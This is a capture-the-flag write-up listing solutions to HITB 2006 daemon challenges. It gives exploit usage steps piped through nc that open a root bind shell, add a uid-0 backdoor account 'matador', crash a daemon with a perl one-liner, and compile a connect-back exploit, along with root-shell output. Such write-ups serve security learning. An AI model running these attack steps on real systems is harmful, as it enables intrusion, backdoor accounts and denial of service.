- UP -
HITB 2006 CTF daemons solutions:
| Daemon | Source | Exploit | Details |
| 01 | Source | Work in progress (80%) |
Details |
| 02 | Source | Work in progress (20%) |
Details |
| 03 | Source | the daemon03 exploit(Day1) the daemon03 exploit(Day2) |
Details Day1 Details Day2 |
| 04 | Source | the daemon04 exploit(Day1) the daemon04 exploit(Day2) Denial of Service |
Details Day1 Details Day2 |
| 06 | Source | the daemon06 exploit |
Details |
- UP -
Remote root shell
This exploit create a root shell that listen on port 12345.
Steps to do:
- python ./exp03.py | nc IP-address 3333
- nc IP-address 12345
consequences...
debian:~# nc IP-address 12345
ls
bin
boot
cdrom
dev
etc
.
.
.
.
.
tmp
usr
var
vmlinuz
vmlinuz.old
id
uid=0(root) gid=0(root)
not bad :-P
- UP -
Day2 ..take the flag
Steps to do:
- python ./exp03.py.day2 | nc IP-address 3333
- nc IP-address 12345
debian:~# nc 1.21.198.53 12345
AAAAAAAAAABBBBBBBBBP
the flag :-)
- UP -
Remote Add User
This exploit add user in machine with follow credentials:
user: matador
password: matador
Steps to do:
- python ./exp.py.day1 2 | nc IP-address 4444
- ssh matador@IP-address
consequences...
/etc/passwd
.
.
daemon03:x:1003:65534::/flags/daemon03:/bin/false
daemon04:x:1004:65534::/flags/daemon04:/bin/false
daemon05:x:1005:65534::/flags/daemon05:/bin/sh
daemon06:x:1006:65534::/flags/daemon06:/bin/false
daemon07:x:1007:65534::/flags/daemon07:/bin/false
matador:AA5hsAy6/h3Wk:0:0::/:/bin/sh
ssh matador@IP-address
matador@IP-address's password:
Linux ctf 2.6.15-26-686 #1 SMP PREEMPT Fri Sep 8 20:16:40 UTC 2006 i686 GNU/Linux
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
root@ctf:/# id
uid=0(root) gid=0(root) groups=0(root)
root@ctf:/#
Maybe there will is/are easier version/s but I have found this one :-P
- UP -
Exploit on Day2 image
Steps to do:
- python ./exp.py.day2 2 | nc IP-address 4444
- nc IP-address 12345
consequences...
matador@matador-desktop:~$ nc IP-address 12345
0000000 4141 4141 4141 4141 4141 4242 4242 4242
0000010 4242 5042 000a
0000015
the flag :-P
- UP -
Denial of Service
There is another exploit(DoS) for this Daemon
perl -e "print 'a'x2105" | nc IP-address 4444 it's very simple..but it work good! :-P
- UP -
Connect back..flag
The exploit work like that:
- modify (inside the source) the "localhost" with victim IP
- compile the source "gcc -lpthread -o exp06 exp06.c"
- use it... :P
- UP -
daemon01 and daemon02
They are quite difficult, especially the second one.
If u wanna help me, pls contact me :)
- UP -
Mac
An article about technique to exploit Mac on x86:
ENG version
ITA version
Some links...
Security Wireless
Vecna's homepage
Cert-it
0xdeadbeef dot info
Phrack
Gera